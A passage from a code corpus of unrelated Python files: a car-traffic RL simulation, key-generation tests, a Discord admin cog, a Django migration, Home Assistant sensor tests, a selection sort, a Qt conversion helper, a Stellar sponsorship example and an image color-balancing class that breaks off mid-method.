if( other._is_in_front(self) ) : #if other car is in front of me
# Check the safety distance
if( self._dist(other) < 3 and other.vel - self.vel <= 0) :
if( other.state == 'park') :
self.state = 'left'
else :
self.state = 'stop'
self.constraint_queue.append(lambda o: other == o and self._dist(other) > 2)
elif( self._is_in_front(other) and self._dist(other) < 3 and
self.vel < other.vel and
(self.direction==1 and self.loc[1] == 3 or #TODO: Hard code warning!
self.direction==-1 and self.loc[1] == 2)) :
self.state = 'right'
elif (isinstance(other,Pedestrian)):
dist_a = (other.loc - self.real_loc)[0]
dist_b = (other.loc - self._predict_loc(2.0))[0]
crossing = dist_a * dist_b < 0
if( crossing ) :
self.state = 'stop'
self.constraint_queue.append(lambda o: other.remove)
yield
class MyCar(Car) :
def __init__(self,x,y,v):
Car.__init__(self,x,y,v)
self.init_state()
def repre(self) :
return {'colour':1} #my car is red colored!
#############
# Functions for reinforcement learning
#############
def set_action(self,action) :
# This function will be called by reinforcement module(like SARSA
# algorithm) outside for every time-step. Decide the next action for
# next timestep.
assert action == 'go' or action == 'stop' or action == 'left' or action =='right'
self.state = action
def tick(self,delta) :
for e in super(MyCar, self).tick(delta) :
if( e is not None and 'Off' in e.message ): self._off_track.append(True)
yield e
def interact(self,other,delta) :
# this function will be called every tick(fine-grained time steps)
# encode the state for timestep(coarse-grained), and accumulate
# accumulate information for reward.
if (isinstance(other,TrafficLights)) :
if( other.get_state() == 'red' and
other._is_crossing(self,delta)
) :
self._traffic_tickets.append(True)
yield ViolateRule('Ticket!')
elif (isinstance(other,Car)):
if( (self.loc == other.loc).all() and
other not in self._hit_cars) :
self._hit_cars.add(other)
yield ViolateRule('Car Crash!')
elif (isinstance(other,Pedestrian)):
if( other._is_squashing_me(self,delta) ):
self._hit_pedestrians.append(True)
yield ViolateRule('Hit Pedestrian!')
yield
def init_state(self):
# accumulated info for calculating reward
self._traffic_tickets = []
self._hit_pedestrians = []
self._hit_cars = set()
self._off_track = []
self._prev_loc = self.loc
def get_state_and_reward(self,world) :
# This function should be called by reinforcement module(like SARSA
# algorithm) outside for every timestep.
dist_moved = (self.loc[0] - self._prev_loc[0])*self.direction % world.road_length
reverse_drive = False
if ( int(self._prev_loc[1]) in World.line_range[1]) :
reverse_drive = True
state = self._get_state(world)
reward = dist_moved * (0.5 if int(self._prev_loc[1]) == World.line_range[2][1]
else 0.3) + \
(-1.5 if reverse_drive else 0.0) + \
(np.count_nonzero(np.array(self._traffic_tickets))*-10.0) + \
(np.count_nonzero(np.array(self._hit_pedestrians))*-20.0) + \
len(self._hit_cars)*-5.0 + \
len(self._off_track)*-10.0
#int(dist_moved == 0) * (-1.0) + \
self.init_state()
return state, reward
class Pedestrian(Movable) :
def __init__(self,x=None,y=None,time_per_cell=1.0,time_schedule=[1,999,1]): #cross_speed=1
x = x or random.randint(10,World.road_length-10)
y = y or World.line_range[0][-1] if random.randint(0,1) == 0 else World.line_range[3][-1]
Movable.__init__(self,x,y)
self.state = 0
self.time = 0.0
self.time_per_cell = time_per_cell
self.time_schedule = time_schedule
self.goal = World.line_range[3][-1] if y == World.line_range[0][-1] else World.line_range[0][-1]
self.direction = -1 if y > self.goal else 1
def char(self) : return u'☺'
def tick(self,delta) :
if( self.state >= len(self.time_schedule) ) :
self.remove = True
return
self.time += delta
if( self.time >= self.time_schedule[self.state] or self.loc[1] == self.goal ) :
self.time = 0.0
self.state += 1
elif( self.state == 1 and self.time >= self.time_per_cell ) :
self.time = 0.0
self.loc[1] += self.direction
yield
def _is_squashing_me(self,car,delta) :
dist_a = (self.loc - car.real_loc)[0]
dist_b = (self.loc - car._predict_loc(delta))[0]
return self.loc[1] == car.real_loc[1] and dist_a * dist_b <= 0
def interact(self,other,delta) :
if (isinstance(other,Car) and
self._is_squashing_me(other,delta) ):
yield ViolateRule('Hit Person!')
yield
if __name__ == "__main__":
world = World()
world.add_obj(TrafficLights(x=10,time_schedule=[1,1,2]))
#world.add_obj(TrafficLights(x=10))
world.add_obj(TrafficLights(x=70,time_schedule=[1,4,4]))
def main_loop(screen) :
def _seconds(s,continuous=True) :
time = 0.0
while(time <= s) :
world.tick();world.draw(screen);
if(continuous) : screen.refresh()
time += world.time_step
screen.refresh();
world.draw_lines(screen)
go = True
while(True) :
ev = screen.get_key()
if ev in [ord('q')] :
return
elif ev in [ord('s')] and not go:
_seconds(1,continuous=False)
elif ev in [ord('g')]:
go = not go
elif ev in [ord('p')]:
world.add_obj(Pedestrian())
elif ev in [ord('u')]:
world.add_obj(Car(x=random.choice(range(1,99)),y=random.choice([1,4]),v=0,state='park'))
elif ev in [ord('c')]:
car = Car()
world.add_obj(car,True)
elif ev in [ord('l')]:
car.state = 'left'
elif ev in [ord('r')]:
car.state = 'right'
if go :
_seconds(1)
Screen.wrapper(main_loop,arguments=[])
print '*****Debug Information*****'
| 3.125 | 3 |
bounca/certificate_engine/tests/test_key.py | warthog9/bounca | 0 | 12760962 | # coding: utf-8
from django.test import TestCase
from cryptography.hazmat.primitives.asymmetric import rsa
from bounca.certificate_engine.ssl.key import Key
class KeyTest(TestCase):
def test_generate_private_key_2048(self):
keyhandler = Key()
keyhandler.create_key(2048)
self.assertEqual(keyhandler.key.key_size, 2048)
pkey = keyhandler.key.public_key()
self.assertIsInstance(pkey.public_numbers(), rsa.RSAPublicNumbers)
def test_generate_private_key_4096(self):
prvkey = Key().create_key(4096)
self.assertEqual(prvkey.key.key_size, 4096)
pkey = prvkey.key.public_key()
self.assertIsInstance(pkey.public_numbers(), rsa.RSAPublicNumbers)
def test_serialize_keys_passphrase(self):
key = Key()
key.create_key(4096)
pem = key.serialize(b'test_store_keys_passphrase')
prvkey = key.load(pem, b'test_store_keys_passphrase')
self.assertIsInstance(prvkey.key, rsa.RSAPrivateKey)
self.assertEqual(prvkey.key.key_size, 4096)
def test_store_keys_no_object(self):
key = Key()
with self.assertRaisesMessage(RuntimeError, "No key object"):
key.serialize(b'test_store_keys_passphrase')
def test_store_keys_no_passphrase(self):
key = Key()
key.create_key(2048)
pem = key.serialize()
key = Key()
prvkey = key.load(pem)
self.assertIsInstance(prvkey.key, rsa.RSAPrivateKey)
self.assertEqual(prvkey.key.key_size, 2048)
def test_store_keys_wrong_passphrase(self):
key = Key()
key.create_key(2048)
pem = key.serialize(b'test_store_keys_wrong_passphrase')
with self.assertRaisesMessage(ValueError, 'Bad decrypt. Incorrect password?'):
key.load(pem, b'test_store_keys_passphrase')
def test_check_passphrase_valid(self):
key = Key()
key.create_key(2048)
pem = key.serialize(b'check_passphrase')
self.assertTrue(key.check_passphrase(pem, b'check_passphrase'))
def test_check_passphrase_invalid(self):
key = Key()
key.create_key(2048)
pem = key.serialize(b'test_check_passphrase_invalid')
self.assertFalse(key.check_passphrase(pem, b'check_passphrase'))
| 2.515625 | 3 |
extensions/bot_admin_utils.py | Pytato/SVGEBot | 0 | 12760963 | from discord.ext import commands
import discord
import asyncio
import logging
class AdminUtilsCog(commands.Cog, name="Admin Utilities"):
"""Cog for administrative commands, be these for users or to manage the bot.
All commands within this cog require administrative permissions or admin-like roles
"""
def __init__(self, bot):
self.bot = bot
self.db_conn_cog = None
self.logger = logging.getLogger("SVGEBot.AdminUtils")
self.delete_message_after = self.bot.bot_config["delete_msg_after"]
self.logger.info("Loaded AdminUtils")
@commands.Cog.listener()
async def on_ready(self):
self.db_conn_cog = self.bot.get_cog("DBConnPool")
async def cog_check(self, ctx):
"""This method is a cog wide check to ensure users have "admin" roles,
It will be called without the need for check decorators on every command.
"""
for role in ctx.message.author.roles:
if role.id in self.bot.bot_config["admin_role_id_list"]:
return True
return False
def cog_unload(self):
self.logger.info("Unloaded AdminUtils")
@commands.command()
async def shutdown(self, ctx):
"""Shuts the bot process down gracefully."""
await ctx.send(":wave:", delete_after=1)
try:
await self.db_conn_cog.shutdown()
except NameError:
pass
await asyncio.sleep(2)
await self.bot.logout()
self.logger.info("Logged out and closed Discord API connection")
self.logger.info("Closing process")
# This sleep is to avoid background loops getting messed with by an
# abrupt exit.
await asyncio.sleep(4)
exit(0)
@commands.command()
async def change_presence(self, ctx, activity, text=">>help"):
"""Changes the bot "presence" statement to that defined in command,
permitting it is one of those permitted by discord.
Command originally written for CyclopsBot by JayDwee.
:arg ctx: Command context, auto-filled by API wrapper.
:arg activity: Activity for the bot to display, must be one of:
:arg text: Text following the activity term"""
activity_list = {
"watching": discord.ActivityType.watching,
"streaming": discord.ActivityType.streaming,
"playing": discord.ActivityType.playing,
"listening": discord.ActivityType.listening
}
if activity.lower() not in activity_list.keys():
await ctx.send(f'"{activity}" is an invalid activity. "WatchingW, "streaming", '
f'"playing", and "listening" are currently supported',
delete_after=self.bot.delete_msg_after)
return
activity_type_to_show = discord.Activity(activity=activity_list[activity.lower()],
name=text)
await self.bot.change_presence(activity=activity_type_to_show)
self.logger.info(f"Activity changed to {activity} {text}")
await ctx.send(f"Activity changed as requested.", delete_after=self.bot.delete_msg_after)
def setup(bot):
bot.add_cog(AdminUtilsCog(bot))
| 2.453125 | 2 |
core/migrations/0001_initial.py | DoorstepDelhi/COVID-19-Back-end | 0 | 12760964 | <gh_stars>0
# Generated by Django 3.2 on 2021-04-26 01:27
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='City',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=120)),
('verified', models.BooleanField(default=False)),
],
options={
'verbose_name_plural': 'Cities',
},
),
migrations.CreateModel(
name='Facility',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128)),
('description', models.TextField()),
('deliver', models.BooleanField(default=False)),
],
options={
'verbose_name_plural': 'Facilities',
},
),
migrations.CreateModel(
name='State',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
],
options={
'verbose_name_plural': 'States',
},
),
migrations.CreateModel(
name='Volunteer',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128)),
('mobile', models.CharField(max_length=15, unique=True)),
('alternate_mobile', models.CharField(blank=True, max_length=15, null=True)),
('available_from', models.TimeField(blank=True, null=True)),
('available_till', models.TimeField(blank=True, null=True)),
('verified', models.BooleanField(default=False)),
('created_at', models.DateTimeField(auto_now_add=True)),
('note', models.TextField(blank=True, null=True)),
('city', models.ManyToManyField(to='core.City')),
('facilities', models.ManyToManyField(null=True, to='core.Facility')),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Volunteers',
},
),
migrations.CreateModel(
name='Service',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=256, null=True)),
('contact_person', models.CharField(blank=True, max_length=150, null=True)),
('mobile', models.CharField(max_length=15)),
('alternate_mobile', models.CharField(blank=True, max_length=15, null=True)),
('address', models.TextField(blank=True, null=True)),
('verified', models.BooleanField(default=True)),
('note', models.TextField(blank=True, null=True)),
('lat', models.FloatField(blank=True, null=True)),
('long', models.FloatField(blank=True, null=True)),
('deliver_at_doorstep', models.BooleanField(default=False)),
('updated_at', models.DateTimeField(auto_now=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('requested_verification', models.BooleanField(default=False)),
('emergency_contact', models.CharField(blank=True, max_length=50, null=True)),
('opening_time', models.TimeField(blank=True, null=True)),
('closing_time', models.TimeField(blank=True, null=True)),
('request_edit', models.BooleanField(default=False)),
('edit', models.TextField(blank=True, null=True)),
('city', models.ManyToManyField(to='core.City')),
('facility', models.ManyToManyField(to='core.Facility')),
],
),
migrations.CreateModel(
name='Hospital',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=500)),
('mobile', models.CharField(max_length=15, unique=True)),
('alternate_mobile', models.CharField(blank=True, max_length=15, null=True)),
('address', models.TextField(blank=True, null=True)),
('verified', models.BooleanField(default=True)),
('lat', models.FloatField(blank=True, null=True)),
('long', models.FloatField(blank=True, null=True)),
('total_oxygen_beds', models.PositiveSmallIntegerField(blank=True, null=True)),
('total_ventilators', models.PositiveSmallIntegerField(blank=True, null=True)),
('total_icu', models.PositiveSmallIntegerField(blank=True, null=True)),
('available_oxygen_beds', models.PositiveSmallIntegerField(blank=True, null=True)),
('available_ventilators', models.PositiveSmallIntegerField(blank=True, null=True)),
('available_icu', models.PositiveSmallIntegerField(blank=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('requested_verification', models.BooleanField(default=False)),
('emergency_contact', models.CharField(blank=True, max_length=50, null=True)),
('opening_time', models.TimeField(blank=True, null=True)),
('closing_time', models.TimeField(blank=True, null=True)),
('request_edit', models.BooleanField(default=False)),
('edit', models.TextField(blank=True, null=True)),
('city', models.ManyToManyField(to='core.City')),
],
),
migrations.CreateModel(
name='Experience',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=150)),
('mobile', models.CharField(blank=True, max_length=16, null=True)),
('alternate_mobile', models.CharField(blank=True, max_length=16, null=True)),
('experience', models.TextField()),
('experienced_on', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('available', models.BooleanField(default=True)),
('visible', models.BooleanField(default=True)),
('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.service')),
],
),
migrations.AddField(
model_name='city',
name='state',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.state'),
),
]
| 1.789063 | 2 |
tests/components/srp_energy/test_sensor.py | GuyKh/core | 7 | 12760965 | <filename>tests/components/srp_energy/test_sensor.py
"""Tests for the srp_energy sensor platform."""
from unittest.mock import MagicMock
from homeassistant.components.sensor import STATE_CLASS_TOTAL_INCREASING
from homeassistant.components.srp_energy.const import (
ATTRIBUTION,
DEFAULT_NAME,
ICON,
SENSOR_NAME,
SENSOR_TYPE,
SRP_ENERGY_DOMAIN,
)
from homeassistant.components.srp_energy.sensor import SrpEntity, async_setup_entry
from homeassistant.const import (
ATTR_ATTRIBUTION,
DEVICE_CLASS_ENERGY,
ENERGY_KILO_WATT_HOUR,
)
async def test_async_setup_entry(hass):
"""Test the sensor."""
fake_async_add_entities = MagicMock()
fake_srp_energy_client = MagicMock()
fake_srp_energy_client.usage.return_value = [{1, 2, 3, 1.999, 4}]
fake_config = MagicMock(
data={
"name": "SRP Energy",
"is_tou": False,
"id": "0123456789",
"username": "<EMAIL>",
"password": "<PASSWORD>",
}
)
hass.data[SRP_ENERGY_DOMAIN] = fake_srp_energy_client
await async_setup_entry(hass, fake_config, fake_async_add_entities)
async def test_async_setup_entry_timeout_error(hass):
"""Test fetching usage data. Failed the first time because was too get response."""
fake_async_add_entities = MagicMock()
fake_srp_energy_client = MagicMock()
fake_srp_energy_client.usage.return_value = [{1, 2, 3, 1.999, 4}]
fake_config = MagicMock(
data={
"name": "SRP Energy",
"is_tou": False,
"id": "0123456789",
"username": "<EMAIL>",
"password": "<PASSWORD>",
}
)
hass.data[SRP_ENERGY_DOMAIN] = fake_srp_energy_client
fake_srp_energy_client.usage.side_effect = TimeoutError()
await async_setup_entry(hass, fake_config, fake_async_add_entities)
assert not fake_async_add_entities.call_args[0][0][
0
].coordinator.last_update_success
async def test_async_setup_entry_connect_error(hass):
"""Test fetching usage data. Failed the first time because was too get response."""
fake_async_add_entities = MagicMock()
fake_srp_energy_client = MagicMock()
fake_srp_energy_client.usage.return_value = [{1, 2, 3, 1.999, 4}]
fake_config = MagicMock(
data={
"name": "SRP Energy",
"is_tou": False,
"id": "0123456789",
"username": "<EMAIL>",
"password": "<PASSWORD>",
}
)
hass.data[SRP_ENERGY_DOMAIN] = fake_srp_energy_client
fake_srp_energy_client.usage.side_effect = ValueError()
await async_setup_entry(hass, fake_config, fake_async_add_entities)
assert not fake_async_add_entities.call_args[0][0][
0
].coordinator.last_update_success
async def test_srp_entity(hass):
"""Test the SrpEntity."""
fake_coordinator = MagicMock(data=1.99999999999)
srp_entity = SrpEntity(fake_coordinator)
srp_entity.hass = hass
assert srp_entity is not None
assert srp_entity.name == f"{DEFAULT_NAME} {SENSOR_NAME}"
assert srp_entity.unique_id == SENSOR_TYPE
assert srp_entity.state is None
assert srp_entity.unit_of_measurement == ENERGY_KILO_WATT_HOUR
assert srp_entity.icon == ICON
assert srp_entity.usage == "2.00"
assert srp_entity.should_poll is False
assert srp_entity.extra_state_attributes[ATTR_ATTRIBUTION] == ATTRIBUTION
assert srp_entity.available is not None
assert srp_entity.device_class == DEVICE_CLASS_ENERGY
assert srp_entity.state_class == STATE_CLASS_TOTAL_INCREASING
await srp_entity.async_added_to_hass()
assert srp_entity.state is not None
assert fake_coordinator.async_add_listener.called
assert not fake_coordinator.async_add_listener.data.called
async def test_srp_entity_no_data(hass):
"""Test the SrpEntity."""
fake_coordinator = MagicMock(data=False)
srp_entity = SrpEntity(fake_coordinator)
srp_entity.hass = hass
assert srp_entity.extra_state_attributes is None
async def test_srp_entity_no_coord_data(hass):
"""Test the SrpEntity."""
fake_coordinator = MagicMock(data=False)
srp_entity = SrpEntity(fake_coordinator)
srp_entity.hass = hass
assert srp_entity.usage is None
async def test_srp_entity_async_update(hass):
"""Test the SrpEntity."""
async def async_magic():
pass
MagicMock.__await__ = lambda x: async_magic().__await__()
fake_coordinator = MagicMock(data=False)
srp_entity = SrpEntity(fake_coordinator)
srp_entity.hass = hass
await srp_entity.async_update()
assert fake_coordinator.async_request_refresh.called
| 2.53125 | 3 |
sort/selection/selection.py | engineersamuel/algorithms-and-datastructures | 0 | 12760966 | def selection(arr):
for i in range(0, len(arr)):
# Min idx starts always at the ith element
min_idx = i
# Look for any local minima going forward
for j in range(i+1, len(arr)):
# If we find one, set the min_idx to what we find
if arr[j] < arr[min_idx]:
min_idx = j
# Swap that min with the location at i
arr[i], arr[min_idx] = arr[min_idx], arr[i]
if __name__ == '__main__':
arrs = [
[4, 3, 3, 7, 6, -1, 10, 3, 8, 4],
[10, 11, 9, 8, 13, 21],
[-1, -1]
]
print("Selection sort")
for arr in arrs:
print("----------------------------------------")
print("unsorted: {}".format(arr))
selection(arr)
print("sorted: {}".format(arr))
print("\n")
print("Selection sort")
for arr in arrs:
print("----------------------------------------")
print("unsorted: {}".format(arr))
selection(arr)
print("sorted: {}".format(arr))
| 4.125 | 4 |
Lib/site-packages/qt_py_convert/_modules/psep0101/_conversion_methods.py | fochoao/cpython | 61 | 12760967 | <reponame>fochoao/cpython<gh_stars>10-100
# Copyright 2018 Digital Domain 3.0
#
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
#
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
#
# You may obtain a copy of the Apache License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
import re
def to_methods(function_str):
"""
to_methods is a helper function that aims to replace all the "toX" methods
from PyQt4-apiV1.0.
:param function_str: String that represents something that may have the
toX methods in it.
:type function_str: str
:return: A string that, if a method was found, has been cleaned.
:rtype: str
"""
match = re.match(
r"""
(?P<object>.*?) # Whatever was before it.
\.to(?: # Get all the options of.
String| # toString
Int| # toInt
Float| # toFloat
Bool| # toBool
PyObject| # toPyObject
Ascii # toAscii
)\(.*?\)(?P<end>.*)""",
function_str,
re.VERBOSE | re.MULTILINE
)
if match:
replacement = match.groupdict()["object"]
replacement += match.groupdict()["end"]
return replacement
return function_str
| 2.359375 | 2 |
examples/sponsored_reserves.py | adeebabdulsalam/py-stellar-base | 1 | 12760968 | <filename>examples/sponsored_reserves.py
from stellar_sdk import Server, TransactionBuilder, Keypair, Network
sponsor_secret = "<KEY>"
new_account_secret = "<KEY>"
sponsor_keypair = Keypair.from_secret(sponsor_secret)
newly_created_keypair = Keypair.from_secret(new_account_secret)
server = Server("https://horizon-testnet.stellar.org")
network_passphrase = Network.TESTNET_NETWORK_PASSPHRASE
# Sponsoring Account Creation
# https://github.com/stellar/stellar-protocol/blob/master/core/cap-0033.md#example-sponsoring-account-creation
sponsor_account = server.load_account(sponsor_keypair.public_key)
sponsoring_account_creation_te = TransactionBuilder(
source_account=sponsor_account,
network_passphrase=network_passphrase
).append_begin_sponsoring_future_reserves_op(
sponsored_id=newly_created_keypair.public_key,
source=sponsor_keypair.public_key
).append_create_account_op(
destination=newly_created_keypair.public_key,
starting_balance="10",
source=sponsor_keypair.public_key
).append_end_sponsoring_future_reserves_op(
source=newly_created_keypair.public_key
).build()
sponsoring_account_creation_te.sign(sponsor_keypair)
sponsoring_account_creation_te.sign(new_account_secret)
sponsoring_account_creation_resp = server.submit_transaction(sponsoring_account_creation_te)
print(sponsoring_account_creation_resp)
# Revoke Account Sponsorship
sponsor_account = server.load_account(sponsor_keypair.public_key)
revoke_account_sponsorship_te = TransactionBuilder(
source_account=sponsor_account,
network_passphrase=network_passphrase
).append_revoke_account_sponsorship_op(
account_id=newly_created_keypair.public_key,
source=sponsor_keypair.public_key
).build()
revoke_account_sponsorship_te.sign(sponsor_keypair)
revoke_account_sponsorship_resp = server.submit_transaction(revoke_account_sponsorship_te)
print(revoke_account_sponsorship_resp)
| 2.078125 | 2 |
src/cbimg/cbimg.py | ludanpr/cbimg | 0 | 12760969 | <reponame>ludanpr/cbimg<filename>src/cbimg/cbimg.py
""" File:
cbimg.py
Implements color balancing algorithms.
"""
import numpy as np
from scipy.stats.mstats import mquantiles
import concurrent.futures
class CBImg:
"""
Implemented Public Methods:
- grayWorld
- simplestColorBalance
- robustAWB
Every public method expects an RGB image and returns an RGB image.
"""
__sRGBtoXYZ = np.array([[0.4124564, 0.3575761, 0.1804375],
[0.2126729, 0.7151522, 0.0721750],
[0.0193339, 0.1191920, 0.9503041]])
def __init__(self):
pass
def __cb_reshape(self, img):
"""
Takes an M x N x 3 RGB image and returns a 3 x (M*N) matrix,
where each column is a RGB pixel.
"""
return np.transpose(img, (2, 0, 1)).reshape((3, np.size(img)//3))
def __cb_unshape(self, matrix, height, width):
"""
Takes a 3 x (M*N) matrix and returns a RGB M x N x 3 matrix.
"""
return np.transpose(matrix.reshape((3, height, width)), (1, 2, 0))
def __XYZ_to_xy(self, xyz):
"""
Converts CIE XYZ to xy chromaticity.
"""
X = xyz[0:1][0]
Y = xyz[1:2][0]
s = np.array([sum(xyz)])
return np.array([X/s, Y/s])
def __xy_to_XYZ(self, xy, Y):
"""
Converts xyY chromaticity to CIE XYZ.
"""
x = xy[0]
y = xy[1]
return np.array([[(Y/y * x), Y, Y/y * (1 - x - y)]], dtype='float64')
def __make_col(self, x):
s = x.shape
if len(s) == 2 and s[0] < s[1]:
x = x.transpose()
return x
def __cb_CAT(self, xyz_est, xyz_target, cat_type):
"""
Chromatic Adaptation Transform.
"""
xyz_est = self.__make_col(xyz_est)
xyz_target = self.__make_col(xyz_target)
xfm = None
if cat_type == "vonKries":
xfm = np.array([[0.40024, 0.7076, -0.08081],
[-0.2263, 1.16532, 0.0457],
[ 0.0, 0.0, 0.91822]])
elif cat_type == "bradford":
xfm = np.array([[ 0.8951, 0.2664, -0.1614],
[-0.7502, 1.7135, 0.0367],
[ 0.0389, -0.0685, 1.0296]])
elif cat_type == "sharp":
xfm = np.array([[ 1.2694, -0.0988, -0.1706],
[-0.8364, 1.8006, 0.0357],
[ 0.0297, -0.0315, 1.0018]])
elif cat_type == "cmccat2000":
xfm = np.array([[ 0.7982, 0.3389, -0.1371],
[-0.5918, 1.5512, 0.0406],
[ 0.0008, 0.239, 0.9753]])
elif cat_type == "cat02":
xfm = np.array([[ 0.7328, 0.4296, -0.1624],
[-0.7036, 1.6975, 0.0061],
[ 0.0030, 0.0136, 0.9834]])
else:
raise ValueError("invalid type for cat_type")
### xfm^(-1) * diagflat(gain) * xfm
gain = np.dot(xfm, xyz_target) / np.dot(xfm, xyz_est)
solution, _, _, _ = np.linalg.lstsq(xfm, np.diagflat(gain), rcond=None)
solution = np.dot(solution, xfm)
# ###
retsolution, _, _, _ = np.linalg.lstsq(self.__sRGBtoXYZ, solution, rcond=None)
return np.dot(retsolution, self.__sRGBtoXYZ)
#############################################
#############################################
#############################################
# Public Methods #
#############################################
def grayWorld(self, img, *, cat_type="vonKries", max_iter=1):
"""!
Color balancing using the Gray World assumption and Chromatic Adaptation
Transform (CAT).
\param img RGB image
\param cat_type string with the CAT type.
Exactly one of:
* vonKries
* bradford
* sharp
* cmccat2000
* cat02
\param max_iter maximum number of iterations
\return The image @c img with its colors balanced
"""
assert type(img) is np.ndarray, 'img is not numpy.ndarray'
assert len(img.shape) == 3 and img.shape[2] == 3, 'img must be in RGB color scheme'
img_rgb = img/255
height, width, _ = img.shape
xyz_D65 = np.array([[95.04], [100.], [108.88]])
b = .001 # convergence limit
img_orig = self.__cb_reshape(img_rgb) * 255
graydiff = []
for i in range(max_iter):
rgb_est = np.array([np.mean(img_orig, axis=1)])
rgb_est = rgb_est.transpose()
graydiff.append(np.linalg.norm(np.array([rgb_est[0] - rgb_est[1],
rgb_est[0] - rgb_est[2],
rgb_est[1] - rgb_est[2]])))
if graydiff[-1] < b: # Convergence
break
elif i >= 1 and abs(graydiff[-2] - graydiff[-1]) < 10e-6:
break
xy_est = self.__XYZ_to_xy(np.dot(self.__sRGBtoXYZ, rgb_est))
xyz_est = self.__xy_to_XYZ(xy_est, 100) # normalize Y to 100 for D-65 luminance comparable
img_rgb = np.dot(self.__cb_CAT(xyz_est, xyz_D65, cat_type), img_orig)
out = self.__cb_unshape(img_rgb, height, width)
np.clip(out, 0, 255, out=out)
return np.uint8(out)
def simplestColorBalance(self, img, *, sat_level=0.01):
"""!
Color balancing through histogram normalization.
\param img RGB image
\param sat_level controls the percentage of pixels clipped to
black and white
\return the image with its colors balanced
"""
assert type(img) is np.ndarray, 'img is not numpy.ndarray'
assert len(img.shape) == 3 and img.shape[2] == 3, 'img must be in RGB color scheme'
height, width, _ = img.shape
q = np.array([sat_level/2.0, 1 - sat_level/2.0])
img_orig = self.__cb_reshape(img/255) * 255
img_rgb = np.zeros(img_orig.shape)
def __closure(c):
low, high = mquantiles(img_orig[c], q, alphap=0.5, betap=0.5)
# Saturate appropriate points in distribution
img_rgb[c] = np.where(img_orig[c] < low, low,
(np.where(img_orig[c] > high, high, img_orig[c])))
bottom = np.amin(img_rgb[c])
top = np.amax(img_rgb[c])
d = top - bottom
img_rgb[c] = (img_rgb[c] - bottom) * 255 / (d if d != 0 else 1)
with concurrent.futures.ThreadPoolExecutor(max_workers=3) as e:
for c in [0, 1, 2]:
e.submit(__closure, c)
out = self.__cb_unshape(img_rgb, height, width)
np.clip(out, 0, 255, out=out)
return np.uint8(out)
def robustAWB(self, img, *, option="CAT", cat_type="vonKries", thresh=0.3, max_iter=1):
"""!
Color balancing through 'robust auto white' estimating gray pixels based
on its deviation from YUV space. Then applying a iterative correction by
using Chromatic Adaptation Transform or directly adjusting the channels
R and B.
\param img an RGB image
\param option the correction method (RBgain or CAT)
\param cat_type the CAT type used if the option argument is CAT
* vonKries
* bradford
* sharp
* cmccat2000
* cat02
\param thresh the deviation limit from gray to consider
\param max_iter the maximum number of iterations
\return the RGB image with its colors balanced
"""
assert type(img) is np.ndarray, 'img is not numpy.ndarray'
assert len(img.shape) == 3 and img.shape[2] == 3, 'img must be in RGB color scheme'
img_rgb = img/255
height, width, _ = img.shape
xyz_D65 = np.array([[95.04], [100.], [108.88]])
u = .01 # gain step
a = .8 # double step limit
b = .001 # convergence limit
# RGB to YUV
xfm = np.array([[ 0.299, 0.587, 0.114],
[-0.299, -0.587, 0.886],
[ 0.701, -0.587, -0.114]])
img_orig = self.__cb_reshape(img_rgb) * 255
img_rgb = img_orig.copy()
gain = np.array([1.0, 1.0, 1.0])
U_avg = []
V_avg = []
gray_total = np.array([])
for i in range(max_iter):
# to YUV
img = np.dot(xfm, img_rgb)
# Find gray chromaticity (|U|+|V|)/Y
with np.errstate(divide='ignore', invalid='ignore'):
F = np.array((abs(img[1]) + abs(img[2])) / img[0])#[0]
gray_total = np.append(gray_total, sum(F<thresh))
if gray_total[-1] == 0: # Valid gray pixels not found
break
grays = img[:, F<thresh]
U_bar = np.mean(grays[1])
V_bar = np.mean(grays[2])
U_avg.append(U_bar)
V_avg.append(V_bar)
if option == "CAT" and cat_type:
if max(abs(np.array([U_bar, V_bar]))) < b: # converged
break
elif i >= 2 and np.linalg.norm(np.array([U_avg[-1] - U_avg[-2], V_avg[-1] - V_avg[-2]])) < 10e-6:
break
# Convert gray average from YUV to RGB
rgb_est, _, _, _ = np.linalg.lstsq(xfm, np.array([[100.], [U_bar], [V_bar]]), rcond=None)
# xy chromaticity
xy_est = self.__XYZ_to_xy(np.dot(self.__sRGBtoXYZ, rgb_est))
# Normalize Y to 100 to be luminance D65 comparable
xyz_est = self.__xy_to_XYZ(xy_est, 100.)
img_rgb = np.dot(self.__cb_CAT(xyz_est, xyz_D65, cat_type), img_rgb)
elif option == "RBgain":
